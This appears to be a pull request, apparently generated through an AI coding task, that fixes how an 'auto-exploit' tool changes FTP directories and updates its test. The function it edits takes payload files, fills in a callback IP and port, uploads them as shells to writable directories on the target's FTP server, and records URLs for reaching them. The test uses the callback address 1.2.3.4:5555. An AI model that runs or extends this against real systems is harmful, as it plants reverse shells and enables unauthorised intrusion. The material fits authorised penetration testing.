### PR TITLE
Fix FTP cwd logic to prevent nested paths

### DIFF
--- a/tests/test_auto_exploit.py
+++ b/tests/test_auto_exploit.py
@@ -49,6 +49,7 @@ def test_upload_ftp_shell_uses_bytesio(tmp_path, monkeypatch):
     finally:
         os.unlink(temp_name)
 
-    assert 'uploads' in ftp_instance.cwd_called
+    assert ftp_instance.cwd_called.count('uploads') == 1
+    assert ftp_instance.cwd_called.count('..') == 1
     assert ftp_instance.stored
     assert any(b'1.2.3.4:5555' in data for _, data in ftp_instance.stored)

--- a/utils/auto-exploit.py
+++ b/utils/auto-exploit.py
@@ -74,6 +74,9 @@ def upload_ftp_shell(ftp_loot, ip, callback):
 
     uploaded = []
     for writable_dir in ftp_loot["writable_dirs"]:
+        # Enter the writable directory once for this batch of payloads. Doing
+        # this outside the file loop avoids repeatedly nesting paths.
+        ftp.cwd(writable_dir)
         for full_path in find_payloads_for("ftp"):
             fname = os.path.basename(full_path)
             try:
@@ -81,13 +84,15 @@ def upload_ftp_shell(ftp_loot, ip, callback):
                     raw = f.read()
                     ip_cb, port_cb = callback.split(":") if callback else ("127.0.0.1", "4444")
                     templated = raw.replace("{{CALLBACK}}", callback).replace("{{CALLBACK_IP}}", ip_cb).replace("{{CALLBACK_PORT}}", port_cb)
-                    ftp.cwd(writable_dir)
                     ftp.storbinary(f"STOR {fname}", BytesIO(templated.encode()))
                     url = f"http://{ip}/{writable_dir}/{fname}"
                     uploaded.append(url)
                     log.append(f"[+] Uploaded: {fname} → /{writable_dir}")
             except Exception as e:
                 log.append(f"[!] Upload failed: {e}")
+        # Return to the parent directory so subsequent iterations start from the
+        # original location and do not nest deeper.
+        ftp.cwd("..")
 
     ftp.quit()
 


### PR DESCRIPTION
## Summary
- prevent repeated `cwd` calls per file upload
- return to parent dir after each writable directory is processed
- adjust tests for new behaviour

## Testing
- `pytest -q`

------
https://chatgpt.com/codex/tasks/task_e_684b06f374708323b44b9fbb898a6ffb